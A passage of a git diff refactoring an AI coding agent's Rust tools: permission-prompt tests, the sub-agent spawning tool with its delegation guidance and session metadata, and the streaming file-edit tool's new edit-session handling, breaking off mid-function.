tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Expected a single authorization prompt", ); @@ -727,7 +733,10 @@ mod tests { let auth = event_rx.expect_authorization().await; auth.response - .send(acp::PermissionOptionId::new("deny")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("deny"), + acp::PermissionOptionKind::RejectOnce, + )) .unwrap(); let output = task.await.unwrap(); diff --git a/crates/agent/src/tools/spawn_agent_tool.rs b/crates/agent/src/tools/spawn_agent_tool.rs index f46e85ce26d9194047ef62223393db0ac30f0f4b..27afbbdc3ea05ddbfea689d1bb1a18c53b42198b 100644 --- a/crates/agent/src/tools/spawn_agent_tool.rs +++ b/crates/agent/src/tools/spawn_agent_tool.rs @@ -1,4 +1,4 @@ -use acp_thread::SUBAGENT_SESSION_ID_META_KEY; +use acp_thread::{SUBAGENT_SESSION_INFO_META_KEY, SubagentSessionInfo}; use agent_client_protocol as acp; use anyhow::Result; use gpui::{App, SharedString, Task}; @@ -10,20 +10,32 @@ use std::sync::Arc; use crate::{AgentTool, ThreadEnvironment, ToolCallEventStream, ToolInput}; -/// Spawns an agent to perform a delegated task. +/// Spawn a sub-agent for a well-scoped task. /// -/// Use this tool when you want to: -/// - Run multiple tasks in parallel. -/// - Delegate a self-contained task where you only need the final outcome. +/// ### Designing delegated subtasks +/// - An agent does not see your conversation history. Include all relevant context (file paths, requirements, constraints) in the message. +/// - Subtasks must be concrete, well-defined, and self-contained. +/// - Delegated subtasks must materially advance the main task. +/// - Do not duplicate work between your work and delegated subtasks. +/// - Do not use this tool for tasks you could accomplish directly with one or two tool calls. +/// - When you delegate work, focus on coordinating and synthesizing results instead of duplicating the same work yourself. +/// - Avoid issuing multiple delegate calls for the same unresolved subproblem unless the new delegated task is genuinely different and necessary. +/// - Narrow the delegated ask to the concrete output you need next. +/// - For code-edit subtasks, decompose work so each delegated task has a disjoint write set. +/// - When sending a follow-up using an existing agent session_id, the agent already has the context from the previous turn. Send only a short, direct message. Do NOT repeat the original task or context. /// -/// You will receive only the agent's final message as output. +/// ### Parallel delegation patterns +/// - Run multiple independent information-seeking subtasks in parallel when you have distinct questions that can be answered independently. +/// - Split implementation into disjoint codebase slices and spawn multiple agents for them in parallel when the write scopes do not overlap. +/// - When a plan has multiple independent steps, prefer delegating those steps in parallel rather than serializing them unnecessarily. +/// - Reuse the returned session_id when you want to follow up on the same delegated subproblem instead of creating a duplicate session. /// -/// **New session** (no session_id): Creates a new agent that does NOT see your conversation history. Include all relevant context (file paths, requirements, constraints) in the message. -/// -/// **Follow-up** (with session_id): Sends a follow-up to an existing agent session. The agent already has full context, so send only a short, direct message — do NOT repeat the original task or context. Examples: "Also update the tests", "Fix the compile error in foo.rs", "Retry". -/// -/// - If spawning multiple agents that might write to the filesystem, provide guidance on how to avoid conflicts (e.g. assign each to different directories). +/// ### Output +/// - You will receive only the agent's final message as output. +/// - Successful calls return a session_id that you can use for follow-up messages. +/// - Error results may also include a session_id if a session was already created. #[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] +#[serde(rename_all = "snake_case")] pub struct SpawnAgentToolInput { /// Short label displayed in the UI while the agent runs (e.g., "Researching alternatives") pub label: String, @@ -34,26 +46,46 @@ pub struct SpawnAgentToolInput { pub session_id: Option, } -#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] +#[derive(Debug, Clone, Serialize, Deserialize)] #[serde(untagged)] +#[serde(rename_all = "snake_case")] pub enum SpawnAgentToolOutput { Success { session_id: acp::SessionId, output: String, + session_info: SubagentSessionInfo, }, Error { #[serde(skip_serializing_if = "Option::is_none")] #[serde(default)] session_id: Option, error: String, + session_info: Option, }, } impl From for LanguageModelToolResultContent { fn from(output: SpawnAgentToolOutput) -> Self { - serde_json::to_string(&output) + match output { + SpawnAgentToolOutput::Success { + session_id, + output, + session_info: _, // Don't show this to the model + } => serde_json::to_string( + &serde_json::json!({ "session_id": session_id, "output": output }), + ) + .unwrap_or_else(|e| format!("Failed to serialize spawn_agent output: {e}")) + .into(), + SpawnAgentToolOutput::Error { + session_id, + error, + session_info: _, // Don't show this to the model + } => serde_json::to_string( + &serde_json::json!({ "session_id": session_id, "error": error }), + ) .unwrap_or_else(|e| format!("Failed to serialize spawn_agent output: {e}")) - .into() + .into(), + } } } @@ -83,9 +115,14 @@ impl AgentTool for SpawnAgentTool { input: Result, _cx: &mut App, ) -> SharedString { - input - .map(|i| i.label.into()) - .unwrap_or_else(|_| "Spawning agent".into()) + match input { + Ok(i) => i.label.into(), + Err(value) => value + .get("label") + .and_then(|v| v.as_str()) + .map(|s| SharedString::from(s.to_owned())) + .unwrap_or_else(|| "Spawning agent".into()), + } } fn run( @@ -101,9 +138,10 @@ impl AgentTool for SpawnAgentTool { .map_err(|e| SpawnAgentToolOutput::Error { session_id: None, error: format!("Failed to receive tool input: {e}"), + session_info: None, })?; - let (subagent, subagent_session_id) = cx.update(|cx| { + let (subagent, mut session_info) = cx.update(|cx| { let subagent = if let Some(session_id) = input.session_id { self.environment.resume_subagent(session_id, cx) } else { @@ -112,40 +150,73 @@ impl AgentTool for SpawnAgentTool { let subagent = subagent.map_err(|err| SpawnAgentToolOutput::Error { session_id: None, error: err.to_string(), + session_info: None, })?; - let subagent_session_id = subagent.id(); + let session_info = SubagentSessionInfo { + session_id: subagent.id(), + message_start_index: subagent.num_entries(cx), + message_end_index: None, + }; - event_stream.subagent_spawned(subagent_session_id.clone()); - let meta = acp::Meta::from_iter([( - SUBAGENT_SESSION_ID_META_KEY.into(), - subagent_session_id.to_string().into(), - )]); - event_stream.update_fields_with_meta(acp::ToolCallUpdateFields::new(), Some(meta)); + event_stream.subagent_spawned(subagent.id()); + event_stream.update_fields_with_meta( + acp::ToolCallUpdateFields::new(), + Some(acp::Meta::from_iter([( + SUBAGENT_SESSION_INFO_META_KEY.into(), + serde_json::json!(&session_info), + )])), + ); - Ok((subagent, subagent_session_id)) + Ok((subagent, session_info)) })?; - match subagent.send(input.message, cx).await { - Ok(output) => { - event_stream.update_fields( - acp::ToolCallUpdateFields::new().content(vec![output.clone().into()]), - ); + let send_result = subagent.send(input.message, cx).await; + + let status = if send_result.is_ok() { + "completed" + } else { + "error" + }; + telemetry::event!( + "Subagent Completed", + subagent_session = session_info.session_id.to_string(), + status, + ); + + session_info.message_end_index = + cx.update(|cx| Some(subagent.num_entries(cx).saturating_sub(1))); + + let meta = Some(acp::Meta::from_iter([( + SUBAGENT_SESSION_INFO_META_KEY.into(), + serde_json::json!(&session_info), + )])); + + let (output, result) = match send_result { + Ok(output) => ( + output.clone(), Ok(SpawnAgentToolOutput::Success { - session_id: subagent_session_id, + session_id: session_info.session_id.clone(), + session_info, output, - }) - } + }), + ), Err(e) => { let error = e.to_string(); - event_stream.update_fields( - acp::ToolCallUpdateFields::new().content(vec![error.clone().into()]), - ); - Err(SpawnAgentToolOutput::Error { - session_id: Some(subagent_session_id), - error, - }) + ( + error.clone(), + Err(SpawnAgentToolOutput::Error { + session_id: Some(session_info.session_id.clone()), + error, + session_info: Some(session_info), + }), + ) } - } + }; + event_stream.update_fields_with_meta( + acp::ToolCallUpdateFields::new().content(vec![output.into()]), + meta, + ); + result }) } @@ -156,25 +227,29 @@ impl AgentTool for SpawnAgentTool { event_stream: ToolCallEventStream, _cx: &mut App, ) -> Result<()> { - let session_id = match &output { - SpawnAgentToolOutput::Success { session_id, .. } => Some(session_id), - SpawnAgentToolOutput::Error { session_id, .. } => session_id.as_ref(), + let (content, session_info) = match output { + SpawnAgentToolOutput::Success { + output, + session_info, + .. + } => (output.into(), Some(session_info)), + SpawnAgentToolOutput::Error { + error, + session_info, + .. + } => (error.into(), session_info), }; - if let Some(session_id) = session_id { - event_stream.subagent_spawned(session_id.clone()); - let meta = acp::Meta::from_iter([( - SUBAGENT_SESSION_ID_META_KEY.into(), - session_id.to_string().into(), - )]); - event_stream.update_fields_with_meta(acp::ToolCallUpdateFields::new(), Some(meta)); - } - - let content = match &output { - SpawnAgentToolOutput::Success { output, .. } => output.into(), - SpawnAgentToolOutput::Error { error, .. } => error.into(), - }; - event_stream.update_fields(acp::ToolCallUpdateFields::new().content(vec![content])); + let meta = session_info.map(|session_info| { + acp::Meta::from_iter([( + SUBAGENT_SESSION_INFO_META_KEY.into(), + serde_json::json!(&session_info), + )]) + }); + event_stream.update_fields_with_meta( + acp::ToolCallUpdateFields::new().content(vec![content]), + meta, + ); Ok(()) } diff --git a/crates/agent/src/tools/streaming_edit_file_tool.rs b/crates/agent/src/tools/streaming_edit_file_tool.rs index 20dfe0ab18aa05e6b90125f1c50a1b8a66ab25f9..47da35bbf25ad188f3f6b98e843b2955910bb7ac 100644 --- a/crates/agent/src/tools/streaming_edit_file_tool.rs +++ b/crates/agent/src/tools/streaming_edit_file_tool.rs @@ -1,13 +1,19 @@ use super::edit_file_tool::EditFileTool; use super::restore_file_from_disk_tool::RestoreFileFromDiskTool; use super::save_file_tool::SaveFileTool; +use super::tool_edit_parser::{ToolEditEvent, ToolEditParser}; +use crate::ToolInputPayload; use crate::{ AgentTool, Thread, ToolCallEventStream, ToolInput, - edit_agent::streaming_fuzzy_matcher::StreamingFuzzyMatcher, + edit_agent::{ + reindent::{Reindenter, compute_indent_delta}, + streaming_fuzzy_matcher::StreamingFuzzyMatcher, + }, }; use acp_thread::Diff; +use action_log::ActionLog; use agent_client_protocol::{self as acp, ToolCallLocation, ToolCallUpdateFields}; -use anyhow::{Context as _, Result, anyhow}; +use anyhow::Result; use collections::HashSet; use futures::FutureExt as _; use gpui::{App, AppContext, AsyncApp, Entity, Task, WeakEntity}; @@ -15,16 +21,20 @@ use language::language_settings::{self, FormatOnSave}; use language::{Buffer, LanguageRegistry}; use language_model::LanguageModelToolResultContent; use project::lsp_store::{FormatTrigger, LspFormatTarget}; -use project::{Project, ProjectPath}; +use project::{AgentLocation, Project, ProjectPath}; use schemars::JsonSchema; -use serde::{Deserialize, Serialize}; +use serde::{ + Deserialize, Deserializer, Serialize, + de::{DeserializeOwned, Error as _}, +}; use std::ops::Range; use std::path::PathBuf; use std::sync::Arc; -use text::{BufferSnapshot, ToOffset as _}; +use streaming_diff::{CharOperation, StreamingDiff}; +use text::ToOffset; use ui::SharedString; use util::rel_path::RelPath; -use util::{Deferred, ResultExt, debug_panic}; +use util::{Deferred, ResultExt}; const DEFAULT_UI_TEXT: &str = "Editing file"; @@ -67,49 +77,57 @@ pub struct StreamingEditFileToolInput { /// /// `frontend/db.js` /// - pub path: String, + pub path: PathBuf, /// The mode of operation on the file. Possible values: - /// - 'create': Create a new file if it doesn't exist. Requires 'content' field. - /// - 'overwrite': Replace the entire contents of an existing file. Requires 'content' field. + /// - 'write': Replace the entire contents of the file. If the file doesn't exist, it will be created. Requires 'content' field. /// - 'edit': Make granular edits to an existing file. Requires 'edits' field. /// /// When a file already exists or you just created it, prefer editing it as opposed to recreating it from scratch. pub mode: StreamingEditFileMode, - /// The complete content for the new file (required for 'create' and 'overwrite' modes). + /// The complete content for the new file (required for 'write' mode). /// This field should contain the entire file content. #[serde(default, skip_serializing_if = "Option::is_none")] pub content: Option, /// List of edit operations to apply sequentially (required for 'edit' mode). /// Each edit finds `old_text` in the file and replaces it with `new_text`. - #[serde(default, skip_serializing_if = "Option::is_none")] - pub edits: Option>, + #[serde( + default, + skip_serializing_if = "Option::is_none", + deserialize_with = "deserialize_optional_vec_or_json_string" + )] + pub edits: Option>, } -#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +#[derive(Clone, Copy, Debug, Serialize, Deserialize, JsonSchema)] #[serde(rename_all = "snake_case")] pub enum StreamingEditFileMode { - /// Create a new file if it doesn't exist - Create, - /// Replace the entire contents of an existing file - Overwrite, + /// Overwrite the file with new content (replacing any existing content). + /// If the file does not exist, it will be created. + Write, /// Make granular edits to an existing file Edit, } /// A single edit operation that replaces old text with new text +/// Properly escape all text fields as valid JSON strings. +/// Remember to escape special characters like newlines (`\n`) and quotes (`"`) in JSON strings. #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] -pub struct EditOperation { +pub struct Edit { /// The exact text to find in the file. This will be matched using fuzzy matching /// to handle minor differences in whitespace or formatting. + /// + /// Be minimal with replacements: + /// - For unique lines, include only those lines + /// - For non-unique lines, include enough context to identify them pub old_text: String, /// The text to replace it with pub new_text: String, } -#[derive(Default, Debug, Deserialize)] +#[derive(Clone, Default, Debug, Deserialize)] struct StreamingEditFileToolPartialInput { #[serde(default)] display_description: Option, @@ -118,140 +136,188 @@ struct StreamingEditFileToolPartialInput { #[serde(default)] mode: Option, #[serde(default)] - #[allow(dead_code)] content: Option, - #[serde(default)] - edits: Option>, + #[serde(default, deserialize_with = "deserialize_optional_vec_or_json_string")] + edits: Option>, } -#[derive(Default, Debug, Deserialize)] -struct PartialEditOperation { +#[derive(Clone, Default, Debug, Deserialize)] +pub struct PartialEdit { #[serde(default)] - old_text: Option, + pub old_text: Option, #[serde(default)] - new_text: Option, + pub new_text: Option, +} + +/// Sometimes the model responds with a stringified JSON array of edits (`"[...]"`) instead of a regular array (`[...]`) +fn deserialize_optional_vec_or_json_string<'de, T, D>( + deserializer: D, +) -> Result>, D::Error> +where + T: DeserializeOwned, + D: Deserializer<'de>, +{ + #[derive(Deserialize)] + #[serde(untagged)] + enum VecOrJsonString { + Vec(Vec), + String(String), + } + + let value = Option::>::deserialize(deserializer)?; + match value { + None => Ok(None), + Some(VecOrJsonString::Vec(items)) => Ok(Some(items)), + Some(VecOrJsonString::String(string)) => serde_json::from_str::>(&string) + .map(Some) + .map_err(|error| { + D::Error::custom(format!("failed to parse stringified edits array: {error}")) + }), + } } -enum StreamingEditState { - Idle, - BufferResolved { - abs_path: PathBuf, - buffer: Entity, +#[derive(Debug, Serialize, Deserialize)] +#[serde(untagged)] +pub enum StreamingEditFileToolOutput { + Success { + #[serde(alias = "original_path")] + input_path: PathBuf, + new_text: String, old_text: Arc, - diff: Entity, - mode: StreamingEditFileMode, - last_content_len: usize, - edit_state: IncrementalEditState, - _finalize_diff_guard: Deferred>, + #[serde(default)] + diff: String, + }, + Error { + error: String, + #[serde(default)] + input_path: Option, + #[serde(default)] + diff: String, }, } -#[derive(Default)] -struct IncrementalEditState { - in_progress_matcher: Option, - last_old_text_len: usize, - applied_ranges: Vec>, +impl StreamingEditFileToolOutput { + pub fn error(error: impl Into) -> Self { + Self::Error { + error: error.into(), + input_path: None, + diff: String::new(), + } + } } -impl IncrementalEditState { - fn applied_count(&self) -> usize { - self.applied_ranges.len() +impl std::fmt::Display for StreamingEditFileToolOutput { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + match self { + StreamingEditFileToolOutput::Success { + diff, input_path, .. + } => { + if diff.is_empty() { + write!(f, "No edits were made.") + } else { + write!( + f, + "Edited {}:\n\n```diff\n{diff}\n```", + input_path.display() + ) + } + } + StreamingEditFileToolOutput::Error { + error, + diff, + input_path, + } => { + write!(f, "{error}\n")?; + if let Some(input_path) = input_path + && !diff.is_empty() + { + write!( + f, + "Edited {}:\n\n```diff\n{diff}\n```", + input_path.display() + ) + } else { + write!(f, "No edits were made.") + } + } + } } } -impl StreamingEditState { - async fn finalize( - &mut self, - input: StreamingEditFileToolInput, - tool: &StreamingEditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result { - let remaining_edits_start_ix = match self { - StreamingEditState::Idle => { - *self = Self::transition_to_buffer_resolved( - &input.path, - &input.display_description, - input.mode.clone(), - tool, - event_stream, - cx, - ) - .await?; - 0 - } - StreamingEditState::BufferResolved { edit_state, .. } => edit_state.applied_count(), - }; +impl From for LanguageModelToolResultContent { + fn from(output: StreamingEditFileToolOutput) -> Self { + output.to_string().into() + } +} - let StreamingEditState::BufferResolved { - buffer, - old_text, - diff, - abs_path, - .. - } = self - else { - debug_panic!("Invalid state"); - return Ok(StreamingEditFileToolOutput::Error { - error: "Internal error. Try to apply the edits again".to_string(), - }); - }; +pub struct StreamingEditFileTool { + project: Entity, + thread: WeakEntity, + action_log: Entity, + language_registry: Arc, +} - let result: anyhow::Result = async { - let action_log = tool - .thread - .read_with(cx, |thread, _cx| thread.action_log().clone())?; +enum EditSessionResult { + Completed(EditSession), + Failed { + error: String, + session: Option, + }, +} - match input.mode { - StreamingEditFileMode::Create | StreamingEditFileMode::Overwrite => { - action_log.update(cx, |log, cx| { - log.buffer_created(buffer.clone(), cx); - }); - let content = input.content.ok_or_else(|| { - anyhow!("'content' field is required for create and overwrite modes") - })?; - cx.update(|cx| { - buffer.update(cx, |buffer, cx| { - buffer.edit([(0..buffer.len(), content.as_str())], None, cx); - }); - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - }); - } - StreamingEditFileMode::Edit => { - let edits = input - .edits - .ok_or_else(|| anyhow!("'edits' field is required for edit mode"))?; - - let remaining_edits = &edits[remaining_edits_start_ix..]; - apply_edits( - &buffer, - &action_log, - remaining_edits, - &diff, - event_stream, - &abs_path, - cx, - )?; - } - } +impl StreamingEditFileTool { + pub fn new( + project: Entity, + thread: WeakEntity, + action_log: Entity, + language_registry: Arc, + ) -> Self { + Self { + project, + thread, + action_log, + language_registry, + } + } - let format_on_save_enabled = buffer.read_with(cx, |buffer, cx| { - let settings = language_settings::language_settings( - buffer.language().map(|l| l.name()), - buffer.file(), - cx, - ); - settings.format_on_save != FormatOnSave::Off + fn authorize( + &self, + path: &PathBuf, + description: &str, + event_stream: &ToolCallEventStream, + cx: &mut App, + ) -> Task> { + super::tool_permissions::authorize_file_edit( + EditFileTool::NAME, + path, + description, + &self.thread, + event_stream, + cx, + ) + } + + fn set_agent_location(&self, buffer: WeakEntity, position: text::Anchor, cx: &mut App) { + let should_update_agent_location = self + .thread + .read_with(cx, |thread, _cx| !thread.is_subagent()) + .unwrap_or_default(); + if should_update_agent_location { + self.project.update(cx, |project, cx| { + project.set_agent_location(Some(AgentLocation { buffer, position }), cx); }); + } + } - if format_on_save_enabled { - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); + async fn ensure_buffer_saved(&self, buffer: &Entity, cx: &mut AsyncApp) { + let format_on_save_enabled = buffer.read_with(cx, |buffer, cx| { + let settings = language_settings::LanguageSettings::for_buffer(buffer, cx); + settings.format_on_save != FormatOnSave::Off + }); - let format_task = tool.project.update(cx, |project, cx| { + if format_on_save_enabled { + self.project + .update(cx, |project, cx| { project.format( HashSet::from_iter([buffer.clone()]), LspFormatTarget::Buffers, @@ -259,546 +325,155 @@ impl StreamingEditState { FormatTrigger::Save, cx, ) - }); - futures::select! { - result = format_task.fuse() => { result.log_err(); }, - _ = event_stream.cancelled_by_user().fuse() => { - anyhow::bail!("Edit cancelled by user"); - } - }; - } - - let save_task = tool - .project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)); - futures::select! { - result = save_task.fuse() => { result?; }, - _ = event_stream.cancelled_by_user().fuse() => { - anyhow::bail!("Edit cancelled by user"); - } - }; - - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - - if let Some(new_mtime) = buffer.read_with(cx, |buffer, _| { - buffer.file().and_then(|file| file.disk_state().mtime()) - }) { - tool.thread.update(cx, |thread, _| { - thread - .file_read_times - .insert(abs_path.to_path_buf(), new_mtime); - })?; - } - - let new_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let (new_text, unified_diff) = cx - .background_spawn({ - let new_snapshot = new_snapshot.clone(); - let old_text = old_text.clone(); - async move { - let new_text = new_snapshot.text(); - let diff = language::unified_diff(&old_text, &new_text); - (new_text, diff) - } }) - .await; - - let output = StreamingEditFileToolOutput::Success { - input_path: PathBuf::from(input.path), - new_text, - old_text: old_text.clone(), - diff: unified_diff, - }; - Ok(output) + .await + .log_err(); } - .await; - result.map_err(|e| StreamingEditFileToolOutput::Error { - error: e.to_string(), - }) + + self.project + .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) + .await + .log_err(); + + self.action_log.update(cx, |log, cx| { + log.buffer_edited(buffer.clone(), cx); + }); } - async fn process( - &mut self, - partial: StreamingEditFileToolPartialInput, - tool: &StreamingEditFileTool, + async fn process_streaming_edits( + &self, + input: &mut ToolInput, event_stream: &ToolCallEventStream, cx: &mut AsyncApp, - ) -> Result<(), StreamingEditFileToolOutput> { - match self { - Self::Idle => { - if let Some(path_str) = partial.path - && let Some(display_description) = partial.display_description - && let Some(mode) = partial.mode - { - *self = Self::transition_to_buffer_resolved( - &path_str, - &display_description, - mode, - tool, - event_stream, - cx, - ) - .await?; - } - } - Self::BufferResolved { - abs_path, - buffer, - edit_state, - diff, - mode, - last_content_len, - .. - } => match mode { - StreamingEditFileMode::Create | StreamingEditFileMode::Overwrite => { - if let Some(content) = &partial.content { - Self::process_streaming_content( - buffer, - diff, - last_content_len, - content, - cx, - )?; + ) -> EditSessionResult { + let mut session: Option = None; + let mut last_partial: Option = None; + + loop { + futures::select! { + payload = input.next().fuse() => { + match payload { + Ok(payload) => match payload { + ToolInputPayload::Partial(partial) => { + if let Ok(parsed) = serde_json::from_value::(partial) { + let path_complete = parsed.path.is_some() + && parsed.path.as_ref() == last_partial.as_ref().and_then(|partial| partial.path.as_ref()); + + last_partial = Some(parsed.clone()); + + if session.is_none() + && path_complete + && let StreamingEditFileToolPartialInput { + path: Some(path), + display_description: Some(display_description), + mode: Some(mode), + .. + } = &parsed + { + match EditSession::new( + PathBuf::from(path), + display_description, + *mode, + self, + event_stream, + cx, + ) + .await + { + Ok(created_session) => session = Some(created_session), + Err(error) => { + log::error!("Failed to create edit session: {}", error); + return EditSessionResult::Failed { + error, + session: None, + }; + } + } + } + + if let Some(current_session) = &mut session + && let Err(error) = current_session.process(parsed, self, event_stream, cx) + { + log::error!("Failed to process edit: {}", error); + return EditSessionResult::Failed { error, session }; + } + } + } + ToolInputPayload::Full(full_input) => { + let mut session = if let Some(session) = session { + session + } else { + match EditSession::new( + full_input.path.clone(), + &full_input.display_description, + full_input.mode, + self, + event_stream, + cx, + ) + .await + { + Ok(created_session) => created_session, + Err(error) => { + log::error!("Failed to create edit session: {}", error); + return EditSessionResult::Failed { + error, + session: None, + }; + } + } + }; + + return match session.finalize(full_input, self, event_stream, cx).await { + Ok(()) => EditSessionResult::Completed(session), + Err(error) => { + log::error!("Failed to finalize edit: {}", error); + EditSessionResult::Failed { + error, + session: Some(session), + } + } + }; + } + ToolInputPayload::InvalidJson { error_message } => { + log::error!("Received invalid JSON: {error_message}"); + return EditSessionResult::Failed { + error: error_message, + session, + }; + } + }, + Err(error) => { + return EditSessionResult::Failed { + error: format!("Failed to receive tool input: {error}"), + session, + }; + } } } - StreamingEditFileMode::Edit => { - if let Some(edits) = partial.edits { - Self::process_streaming_edits( - buffer, - diff, - edit_state, - &edits, - abs_path, - tool, - event_stream, - cx, - )?; - } + _ = event_stream.cancelled_by_user().fuse() => { + return EditSessionResult::Failed { + error: "Edit cancelled by user".to_string(), + session, + }; } - }, + } } - Ok(()) } +} - async fn transition_to_buffer_resolved( - path_str: &str, - display_description: &str, - mode: StreamingEditFileMode, - tool: &StreamingEditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result { - let path = PathBuf::from(path_str); - let project_path = cx - .update(|cx| resolve_path(mode.clone(), &path, &tool.project, cx)) - .map_err(|e| StreamingEditFileToolOutput::Error { - error: e.to_string(), - })?; - - let Some(abs_path) = cx.update(|cx| tool.project.read(cx).absolute_path(&project_path, cx)) - else { - return Err(StreamingEditFileToolOutput::Error { - error: format!("File '{path_str}' does not exist"), - }); - }; - - event_stream.update_fields( - ToolCallUpdateFields::new().locations(vec![ToolCallLocation::new(abs_path.clone())]), - ); - - cx.update(|cx| tool.authorize(&path, &display_description, event_stream, cx)) - .await - .map_err(|e| StreamingEditFileToolOutput::Error { - error: e.to_string(), - })?; - - let buffer = tool - .project - .update(cx, |project, cx| project.open_buffer(project_path, cx)) - .await - .map_err(|e| StreamingEditFileToolOutput::Error { - error: e.to_string(), - })?; - - ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; - - let diff = cx.new(|cx| Diff::new(buffer.clone(), cx)); - event_stream.update_diff(diff.clone()); - let finalize_diff_guard = util::defer(Box::new({ - let diff = diff.downgrade(); - let mut cx = cx.clone(); - move || { - diff.update(&mut cx, |diff, cx| diff.finalize(cx)).ok(); - } - }) as Box); +impl AgentTool for StreamingEditFileTool { + type Input = StreamingEditFileToolInput; + type Output = StreamingEditFileToolOutput; - let old_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let old_text = cx - .background_spawn({ - let old_snapshot = old_snapshot.clone(); - async move { Arc::new(old_snapshot.text()) } - }) - .await; + const NAME: &'static str = "streaming_edit_file"; - Ok(Self::BufferResolved { - abs_path, - buffer, - old_text, - diff, - mode, - last_content_len: 0, - edit_state: IncrementalEditState::default(), - _finalize_diff_guard: finalize_diff_guard, - }) + fn supports_input_streaming() -> bool { + true } - fn process_streaming_content( - buffer: &Entity, - diff: &Entity, - last_content_len: &mut usize, - content: &str, - cx: &mut AsyncApp, - ) -> Result<(), StreamingEditFileToolOutput> { - let new_len = content.len(); - if new_len > *last_content_len { - let new_chunk = &content[*last_content_len..]; - cx.update(|cx| { - buffer.update(cx, |buffer, cx| { - // On the first update, replace the entire buffer (handles Overwrite - // clearing existing content). For Create the buffer is already empty - // so 0..0 is a no-op range prefix. - let insert_at = if *last_content_len == 0 { - 0..buffer.len() - } else { - let len = buffer.len(); - len..len - }; - buffer.edit([(insert_at, new_chunk)], None, cx); - }); - }); - *last_content_len = new_len; - - let anchor_range = buffer.read_with(cx, |buffer, _cx| { - buffer.anchor_range_between(0..buffer.len()) - }); - diff.update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); - } - Ok(()) - } - - fn process_streaming_edits( - buffer: &Entity, - diff: &Entity, - edit_state: &mut IncrementalEditState, - edits: &[PartialEditOperation], - abs_path: &PathBuf, - tool: &StreamingEditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result<(), StreamingEditFileToolOutput> { - if edits.is_empty() { - return Ok(()); - } - - // Edits at indices applied_count..edits.len()-1 are newly complete - // (a subsequent edit exists, proving the LLM moved on). - // The last edit (edits.len()-1) is potentially still in progress. - let completed_count = edits.len().saturating_sub(1); - - // Apply newly-complete edits - while edit_state.applied_count() < completed_count { - let edit_index = edit_state.applied_count(); - let partial_edit = &edits[edit_index]; - - let old_text = partial_edit.old_text.clone().ok_or_else(|| { - StreamingEditFileToolOutput::Error { - error: format!("Edit at index {} is missing old_text.", edit_index), - } - })?; - let new_text = partial_edit.new_text.clone().unwrap_or_default(); - - edit_state.in_progress_matcher = None; - edit_state.last_old_text_len = 0; - - let edit_op = EditOperation { - old_text: old_text.clone(), - new_text: new_text.clone(), - }; - - let action_log = tool - .thread - .read_with(cx, |thread, _cx| thread.action_log().clone()) - .ok(); - - // On the first edit, mark the buffer as read - if edit_state.applied_count() == 0 { - if let Some(action_log) = &action_log { - action_log.update(cx, |log, cx| { - log.buffer_read(buffer.clone(), cx); - }); - } - } - - let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - - let (range, new_text) = - match resolve_and_reveal_edit(buffer, diff, &snapshot, &edit_op, cx) { - Ok(resolved) => resolved, - Err(EditResolveError::NotFound) => { - return Err(StreamingEditFileToolOutput::Error { - error: format!( - "Could not find matching text for edit at index {}. \ - The old_text did not match any content in the file. \ - Please read the file again to get the current content.", - edit_index - ), - }); - } - Err(EditResolveError::Ambiguous(ranges)) => { - let lines = ranges - .iter() - .map(|r| (snapshot.offset_to_point(r.start).row + 1).to_string()) - .collect::>() - .join(", "); - return Err(StreamingEditFileToolOutput::Error { - error: format!( - "Edit {} matched multiple locations in the file at lines: {}. \ - Please provide more context in old_text to uniquely \ - identify the location.", - edit_index, lines - ), - }); - } - }; - - for previous_range in &edit_state.applied_ranges { - let previous_start = previous_range.start.to_offset(&snapshot); - let previous_end = previous_range.end.to_offset(&snapshot); - if range.start < previous_end && previous_start < range.end { - let earlier_start_line = snapshot.offset_to_point(previous_start).row + 1; - let earlier_end_line = snapshot.offset_to_point(previous_end).row + 1; - let later_start_line = snapshot.offset_to_point(range.start).row + 1; - let later_end_line = snapshot.offset_to_point(range.end).row + 1; - return Err(StreamingEditFileToolOutput::Error { - error: format!( - "Conflicting edit ranges detected: lines {}-{} \ - conflicts with lines {}-{}. Conflicting edit \ - ranges are not allowed, as they would overwrite \ - each other.", - earlier_start_line, earlier_end_line, later_start_line, later_end_line, - ), - }); - } - } - - let anchor_range = - buffer.read_with(cx, |buffer, _cx| buffer.anchor_range_between(range.clone())); - edit_state.applied_ranges.push(anchor_range); - - let line = snapshot.offset_to_point(range.start).row; - event_stream.update_fields( - ToolCallUpdateFields::new() - .locations(vec![ToolCallLocation::new(abs_path).line(Some(line))]), - ); - - if let Some(action_log) = action_log { - cx.update(|cx| { - buffer.update(cx, |buffer, cx| { - buffer.edit([(range, new_text.as_str())], None, cx); - }); - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - }); - } - } - - // Feed the in-progress last edit's old_text to the matcher for live preview - if let Some(partial_edit) = edits.last() { - if let Some(old_text) = &partial_edit.old_text { - let old_text_len = old_text.len(); - if old_text_len > edit_state.last_old_text_len { - let new_chunk = 